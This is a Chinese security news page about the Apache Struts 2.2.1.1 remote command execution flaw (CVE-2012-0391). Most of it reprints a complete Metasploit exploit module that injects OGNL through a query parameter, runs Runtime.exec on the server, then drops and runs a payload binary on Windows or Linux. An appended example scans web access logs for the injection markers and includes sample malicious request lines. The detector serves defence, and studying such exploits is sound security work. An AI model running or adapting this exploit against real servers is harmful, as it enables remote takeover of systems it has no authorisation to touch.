Apache Struts 2.2.1.1 Remote Command Execution Vulnerability

Author: 龙虎鹰师网安 Apache Tutorial Network  Source: 龙虎鹰师网安 Apache Tutorial Network

Keywords: Apache
龙虎鹰师网安 news: The latest Apache Struts vulnerability has been published: Apache Struts 2.2.1.1 remote command execution vulnerability (Apache Struts

################################################################
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#  http://metasploit.com/
################################################################

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::CmdStagerTFTP
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution',
            'Description'    => %q{
                    This module exploits a remote command execution vulnerability in
                Apache Struts versions < 2.2.1.1. This issue is caused because the
                ExceptionDelegator interprets parameter values as OGNL expressions
                during certain exception handling for mismatched data types of properties,
                which allows remote attackers to execute arbitrary Java code via a
                crafted parameter.
            },
            'Author'         =>
                [
                    'Johannes Dahse', # Vulnerability discovery and PoC
                    'Andreas Nusser', # Vulnerability discovery and PoC
                    'juan vazquez', # Metasploit module
                    'sinn3r' # Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'CVE', '2012-0391'],
                    [ 'OSVDB', '78277'],
                    [ 'EDB', '18329'],
                    [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
                ],
            'Platform'      => [ 'win', 'linux'],
            'Privileged'     => true,
            'Targets'        =>
                [
                    ['Windows Universal',
                        {
                                'Arch' => ARCH_X86,
                                'Platform' => 'win'
                        }
                    ],
                    ['Linux Universal',
                        {
                                'Arch' => ARCH_X86,
                                'Platform' => 'linux'
                        }
                    ],
                ],
            'DisclosureDate' => 'Jan 06 2012',
            'DefaultTarget' => 0))

        register_options(
            [
                Opt::RPORT(8080),
                OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
                OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
            ], self.class)
    end

    def execute_command(cmd, opts = {})

        uri = String.new(datastore['TARGETURI'])
        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
        uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

        vprint_status("Attempting to execute: #{cmd}")

        resp = send_request_raw({
            'uri'     => uri,
            'version' => '1.1',
            'method'  => 'GET',
        }, 5)
    end

    def windows_stager
        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
        execute_cmdstager({ :temp => '.'})
        @payload_exe = payload_exe

        print_status("Attempting to execute the payload...")
        execute_command(@payload_exe)
    end

    def linux_stager
        cmds = "/bin/sh@-c@echo LINE | tee FILE"
        exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
        base64 = Rex::Text.encode_base64(exe)
        base64.gsub!(/\=/, "\\u003d")
        file = rand_text_alphanumeric(4+rand(4))

        execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
        cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
        base64.each_line do |line|
            line.chomp!
            cmd = cmds
            cmd.gsub!(/LINE/, line)
            execute_command(cmds)
        end

        execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
        execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
        execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")

        execute_command("/bin/sh@-c@/tmp/#{file}")
        @payload_exe = "/tmp/" + file
    end

    def on_new_session(client)
        if target['Platform'] == 'linux'
            print_status("Deleting #{@payload_exe} payload file")
            execute_command("/bin/sh@-c@rm #{@payload_exe}")
        else
            print_status("Windows does not allow running executables to be deleted")
            print_status("Delete the #{@payload_exe} file manually after migrating")
        end
    end

    def exploit
        if not datastore['CMD'].empty?
            print_status("Executing user supplied command")
            execute_command(datastore['CMD'])
            return
        end

        case target['Platform']
            when 'linux'
                linux_stager
            when 'win'
                windows_stager
            else
                raise RuntimeError, 'Unsupported target platform!'
        end

        handler
    end
end
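
The request built in execute_command carries fixed OGNL markers (the `_memberAccess` context variable, `allowStaticMethodAccess` and a static call to `java.lang.Runtime`) in a percent-encoded query parameter, which makes it detectable in web server access logs. The following Ruby code is an added example, not part of the original page or of the Metasploit project: it decodes each logged request target and reports entries containing those markers. The log lines, client addresses, marker names and the double-encoded variant are constructed for illustration.

```ruby
# Added example: flag access-log entries carrying the OGNL markers of the request above.
OGNL_MARKERS = {
  'member_access'        => /#_memberaccess/i,
  'static_method_access' => /allowstaticmethodaccess/i,
  'runtime_exec'         => /@java\.lang\.runtime@getruntime/i
}.freeze

# Client address and request target of a common/combined-format entry.
REQUEST_RE = /\A(\S+) .*?"[A-Z]+ (\S+) HTTP\/[\d.]+"/

# Percent-decode repeatedly (bounded) so %23 and double-encoded %2523 both become '#'.
# Works on a binary copy so malformed escapes or non-UTF-8 bytes cannot raise.
def deep_decode(value, max_rounds = 3)
  value = value.b
  max_rounds.times do
    decoded = value.gsub(/%(\h\h)/) { $1.hex.chr }
    break if decoded == value
    value = decoded
  end
  value
end

# Returns one hash per suspicious entry: line number, client, matched marker names.
def scan_access_log(text)
  text.each_line.with_index(1).filter_map do |line, n|
    next unless (m = REQUEST_RE.match(line.b))
    target = deep_decode(m[2])
    hits = OGNL_MARKERS.select { |_, re| re.match?(target) }.keys
    hits.empty? ? nil : { line: n, client: m[1], markers: hits }
  end
end

# Constructed sample entries; "CMD" is the module's unexpanded placeholder.
SAMPLE_LOG = <<~'LOG'
  198.51.100.7 - - [06/Jan/2012:10:00:01 +0000] "GET /HelloWorldStruts2/hello?name=test&id=42 HTTP/1.1" 200 512
  203.0.113.9 - - [06/Jan/2012:10:00:05 +0000] "GET /HelloWorldStruts2/hello?name=test&id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec("CMD"))%2b' HTTP/1.1" 200 512
  203.0.113.9 - - [06/Jan/2012:10:00:09 +0000] "GET /HelloWorldStruts2/hello?id=%2527%252b(%2523_MemberAccess%255b%2522allowStaticMethodAccess%2522%255d=true)%252b%2527 HTTP/1.1" 400 0
  198.51.100.7 - - [06/Jan/2012:10:00:12 +0000] "GET /search?q=C%23+tutorial HTTP/1.1" 200 900
  198.51.100.7 - - [06/Jan/2012:10:00:15 +0000] "-" 408 0
LOG

scan_access_log(SAMPLE_LOG).each { |hit| puts hit.inspect } if __FILE__ == $0
```

Query strings only reach the access log for GET requests; the same markers sent in a POST body require request-body inspection at a proxy or WAF.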

Permalink for this article: http://www.rongsen.com.cn/show-17260-1.html
Updated: 2012-09-12 00:12:48